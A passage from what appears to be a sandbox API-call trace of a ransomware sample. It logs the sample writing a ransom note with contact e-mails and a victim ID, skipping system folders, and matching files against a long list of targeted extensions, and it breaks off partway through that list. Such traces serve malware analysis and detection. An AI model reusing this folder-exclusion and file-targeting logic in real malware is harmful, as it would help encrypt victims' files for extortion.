<br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0173.063] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0173.066] CloseHandle (hObject=0x390) returned 1
	[0173.067] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.067] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.067] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.068] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0173.069] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.069] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.069] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.069] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.069] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0173.070] CloseHandle (hObject=0x390) returned 1
	[0173.070] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x80acb89b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80af2c2e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0173.070] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*") returned 89
	[0173.070] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.071] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*") returned 0x59
	[0173.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.071] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0173.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.071] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0173.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.071] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0173.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.072] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.072] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0173.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.073] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0173.073] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.073] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.073] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.073] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0173.073] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.073] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0173.073] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0173.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0173.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0173.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0173.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0173.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0173.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0173.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0173.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0173.076] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.076] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.076] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x80acb89b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80af2c2e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0173.077] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.077] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af2c2e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80af2c2e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80af2c2e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.077] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80acb89b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80acb89b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80acb89b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.077] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0173.077] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0173.077] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0173.077] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov"
	[0173.077] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\"
	[0173.077] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime"
	[0173.078] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime"
	[0173.078] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\"
	[0173.078] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\"
	[0173.078] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*"
	[0173.078] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb9330
	[0173.078] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*") returned 97
	[0173.078] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.079] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*") returned 0x61
	[0173.079] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.079] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0173.079] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.079] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0173.079] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.079] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0173.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.080] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.080] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0173.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.080] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0173.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0173.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0173.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0173.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.082] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0173.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.082] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0173.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.082] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.082] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0173.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0173.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0173.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0173.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0173.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0173.084] FindNextFileW (in: hFindFile=0xfb9330, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0173.084] FindNextFileW (in: hFindFile=0xfb9330, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa198dbb0, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa198dbb0, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa19b3e1c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xfcb, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0173.084] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0173.084] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0173.084] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\"
	[0173.085] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml"
	[0173.085] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0173.085] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.085] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0173.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.085] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.085] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml"
	[0173.086] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml") returned 109
	[0173.086] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.086] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0173.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.086] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.d